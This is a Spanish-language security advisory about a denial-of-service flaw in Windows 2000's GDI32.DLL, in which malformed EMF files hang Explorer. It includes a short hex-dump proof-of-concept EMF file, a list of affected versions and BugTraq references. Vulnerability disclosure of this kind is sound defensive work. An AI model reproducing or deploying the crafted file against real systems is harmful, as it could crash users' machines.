DoS en GDI32.DLL al leer archivos EMF (Windows 2000)Se ha reportado una vulnerabilidad capaz de producir una denegación de servicio (DoS), que afecta la biblioteca GDI32.DLL (Graphical Device Interface, GDI Client DLL) de Windows 2000.
El problema ocurre porque la aplicación asociada a dicha biblioteca falla cuando intenta copiar los datos de un archivo de imagen EMF modificado maliciosamente.
Un atacante puede utilizar esto para causar una denegación de servicio en el software que directa o indirectamente utilice a GDI32.DLL (por ejemplo EXPLORER.EXE), haciendo que dicha aplicación deje de responder (ello puede ocurrir por ejemplo, cada vez que una carpeta conteniendo archivos .EMF malformados sea abierta por el Explorador de Windows).
Otra clase de ataque puede ser implementado a partir de este fallo.
EMF (Enhanced Metafile), es un formato de gráficos propietario de Microsoft Windows, y utilizado por múltiples aplicaciones).
Se ha publicado la siguiente prueba de concepto (el ejemplo es un archivo EMF en formato hexadecimal):
-------------------------------------------------------
0000000 01 00 00 00 64 00 00 00 93 00 00 00 02 00 00 00
0000010 83 01 00 00 39 01 00 00 00 00 00 00 00 00 00 00
0000020 d1 08 00 00 be 06 00 00 20 45 4d 46 00 00 01 00
0000030 78 00 00 00 17 00 00 00 03 00 00 00 0f 00 00 00
0000040 64 00 00 00 41 00 00 00 c8 12 00 00 c2 1a 00 00
0000050 cc 00 00 00 22 01 00 00 00 00 00 00 00 00 00 00
0000060 00 00 00 00 0e 00 00 00 14 00 00 00 41 00 00 00
0000070 41 42 43 44 00 00 01 ff
-------------------------------------------------------
Software vulnerable:
- Microsoft Windows 2000 Advanced Server SP4
- Microsoft Windows 2000 Advanced Server SP3
- Microsoft Windows 2000 Advanced Server SP2
- Microsoft Windows 2000 Advanced Server SP1
- Microsoft Windows 2000 Advanced Server
- Microsoft Windows 2000 Datacenter Server SP4
- Microsoft Windows 2000 Datacenter Server SP3
- Microsoft Windows 2000 Datacenter Server SP2
- Microsoft Windows 2000 Datacenter Server SP1
- Microsoft Windows 2000 Datacenter Server
- Microsoft Windows 2000 Professional SP4
- Microsoft Windows 2000 Professional SP3
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows 2000 Server SP4
- Microsoft Windows 2000 Server SP3
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Server SP1
- Microsoft Windows 2000 Server
Al momento actual no se ha reportado este problema en otras versiones de Windows.
Soluciones:
No existe solución oficial al momento de publicar este aviso.
Créditos:
Hongzhen Zhou <
[email protected]>
Referencias:
Identificado en BugTraq como ID 12834
Microsoft Windows Graphical Device Interface Library
Denial Of Service Vulnerability
http://www.securityfocus.com/bid/12834Windows 2000 GDI32.DLL GetEnhMetaFilePaletteEntries()
API specially crafted EMF
http://www.securityfocus.com/archive/1/393571Relacionados:
Ejecución de código en Windows XP con archivos EMF
http://www.vsantivirus.com/vul-xp-explorer-emf.htmMS04-032 Actualización crítica para Windows (840987)
http://www.vsantivirus.com/vulms04-032.htmMS04-011 Actualización crítica de Windows (835732)
http://www.vsantivirus.com/vulms04-011.htmPublicado en:
http://www.vsantivirus.com/vul-bugtraq-12834.htm
